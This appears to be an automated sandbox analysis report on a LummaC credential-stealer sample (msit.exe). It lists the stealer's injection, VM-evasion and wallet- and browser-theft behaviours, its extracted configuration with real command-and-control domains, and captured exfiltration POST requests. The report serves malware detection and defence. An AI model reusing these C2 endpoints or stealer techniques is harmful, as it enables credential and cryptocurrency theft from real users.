Edit tour

Windows Analysis Report
msit.exe

Overview

General Information

Sample name:	msit.exe
Analysis ID:	1589843
MD5:	bb0ca87d28e7c1bfd53e3e592e75e684
SHA1:	23be4528fe7dd78243845a6a08a88ce68200d59a
SHA256:	d34e7af4d266688eb65118de606ffbeb36d46d488c3be604a5cb240778550cea
Tags:	exeghd78sgithubuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

msit.exe (PID: 4472 cmdline: "C:\Users\user\Desktop\msit.exe" MD5: BB0CA87D28E7C1BFD53E3E592E75E684)

msiexec.exe (PID: 5320 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 " MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 4052 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 5424 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2456 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSIA455.tmp (PID: 6188 cmdline: "C:\Windows\Installer\MSIA455.tmp" MD5: 4D82074854750FDBA89D76624CC1E6F6)

dxdiag.exe (PID: 1984 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "fixxyplanterv.click", "zinc-sneark.biz", "formy-spill.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "ZqchOa--new"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: dxdiag.exe PID: 1984	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 1984	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 1984	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:40.217641+0100	2028371	3	Unknown Traffic	192.168.2.8	49707	104.21.6.116	443	TCP
2025-01-13T08:34:41.565036+0100	2028371	3	Unknown Traffic	192.168.2.8	49708	104.21.6.116	443	TCP
2025-01-13T08:34:42.738566+0100	2028371	3	Unknown Traffic	192.168.2.8	49709	104.21.6.116	443	TCP
2025-01-13T08:34:43.734959+0100	2028371	3	Unknown Traffic	192.168.2.8	49710	104.21.6.116	443	TCP
2025-01-13T08:34:44.942967+0100	2028371	3	Unknown Traffic	192.168.2.8	49711	104.21.6.116	443	TCP
2025-01-13T08:34:47.431490+0100	2028371	3	Unknown Traffic	192.168.2.8	49712	104.21.6.116	443	TCP
2025-01-13T08:34:48.815217+0100	2028371	3	Unknown Traffic	192.168.2.8	49715	104.21.6.116	443	TCP
2025-01-13T08:34:50.929730+0100	2028371	3	Unknown Traffic	192.168.2.8	49719	104.21.6.116	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:40.897301+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49707	104.21.6.116	443	TCP
2025-01-13T08:34:42.043887+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49708	104.21.6.116	443	TCP
2025-01-13T08:34:51.433133+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49719	104.21.6.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:40.897301+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49707	104.21.6.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:42.043887+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49708	104.21.6.116	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:44.283700+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49710	104.21.6.116	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["se-blurry.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "fixxyplanterv.click", "zinc-sneark.biz", "formy-spill.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "ZqchOa--new"}

Multi AV Scanner detection for dropped file

Source: C:\Windows\Installer\MSIA455.tmp

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: msit.exe

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Machine Learning detection for dropped file

Source: C:\Windows\Installer\MSIA455.tmp

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: fixxyplanterv.click
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000006.00000002.1590276452.0000024A44351000.00000004.00000020.00020000.00000000.sdmp	String decryptor: ZqchOa--new

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 7_2_00415971 CryptUnprotectData,

7_2_00415971

Source: msit.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49719 version: TLS 1.2

Source: msit.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wininet.pdb source: shi95F5.tmp.0.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: msit.msi.0.dr
Source:	Binary string: ucrtbase.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: MSIA2EC.tmp.2.dr, MSI986D.tmp.0.dr, MSI97FE.tmp.0.dr, MSI982E.tmp.0.dr, msit.msi.0.dr
Source:	Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: MSIA28C.tmp.2.dr, msit.msi.0.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: MSIA28C.tmp.2.dr, msit.msi.0.dr
Source:	Binary string: wininet.pdbUGP source: shi95F5.tmp.0.dr
Source:	Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msit.msi.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSIA20D.tmp.2.dr, MSI9720.tmp.0.dr, msit.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: msit.exe
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: msit.msi.0.dr
Source:	Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: msit.msi.0.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\	Jump to behavior
Source: C:\Users\user\Desktop\msit.exe	File opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\	Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 152A0A64h	7_2_0040D866
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	7_2_0043C8F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, ebx	7_2_00415971
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	7_2_0043CA10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [eax], dl	7_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edi, dword ptr [esi+10h]	7_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [eax], dl	7_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	7_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-5Ch]	7_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+eax*8], 299A4ECDh	7_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+04h]	7_2_0040CDD7
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	7_2_00438640
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+edi-14B5D619h]	7_2_004227B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], B12AB835h	7_2_0041805C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [edi], bl	7_2_00409070
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	7_2_00425800
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [ecx], dx	7_2_0041C802
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [esi], cl	7_2_00425820
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 71D94D17h	7_2_004180EC
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+76h]	7_2_004238F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 403020B8h	7_2_0040D136
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	7_2_004029C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+eax*8], 9CAC4597h	7_2_0040D9D6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	7_2_0042A9D5
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [esi], cx	7_2_004231F6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx esi, word ptr [eax]	7_2_004231F6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	7_2_0041A9B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [edx], bp	7_2_0041CA48
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp ecx	7_2_0043BA70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov esi, edx	7_2_0043BA70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	7_2_0042AAC6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	7_2_0042AAD7
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then lea edx, dword ptr [edx+edx*4]	7_2_004082F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	7_2_004362F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 67F3D776h	7_2_004362F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]	7_2_00426282
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	7_2_0041DA80
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	7_2_0042AA8A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00432AA0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	7_2_004022B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp eax	7_2_0041BB20
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp word ptr [ebx+esi], 0000h	7_2_0041C330
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+65184CD6h]	7_2_00436BE4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	7_2_00407450
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	7_2_00407450
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]	7_2_004264F2
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]	7_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	7_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, word ptr [eax]	7_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp ecx	7_2_0040A4FC
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, di	7_2_0042456F
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	7_2_00421D73
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	7_2_00421D73
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h	7_2_00438D70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h	7_2_00438D70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 1F1F7B79h	7_2_00417D74
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-00000095h]	7_2_0042A58E
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_00428DB0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+40h]	7_2_0041AEC5
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [ecx], dx	7_2_0040DEE9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp eax	7_2_0043B6F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, edx	7_2_0041676A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_00416F7C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	7_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-4D5F809Ah]	7_2_0043A71E
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, ecx	7_2_00409730
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-35CC155Bh]	7_2_0041AFD8
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, di	7_2_0042456F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49719 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49710 -> 104.21.6.116:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: fixxyplanterv.click
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: print-vexer.biz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 104.21.6.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.6.116:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fixxyplanterv.click
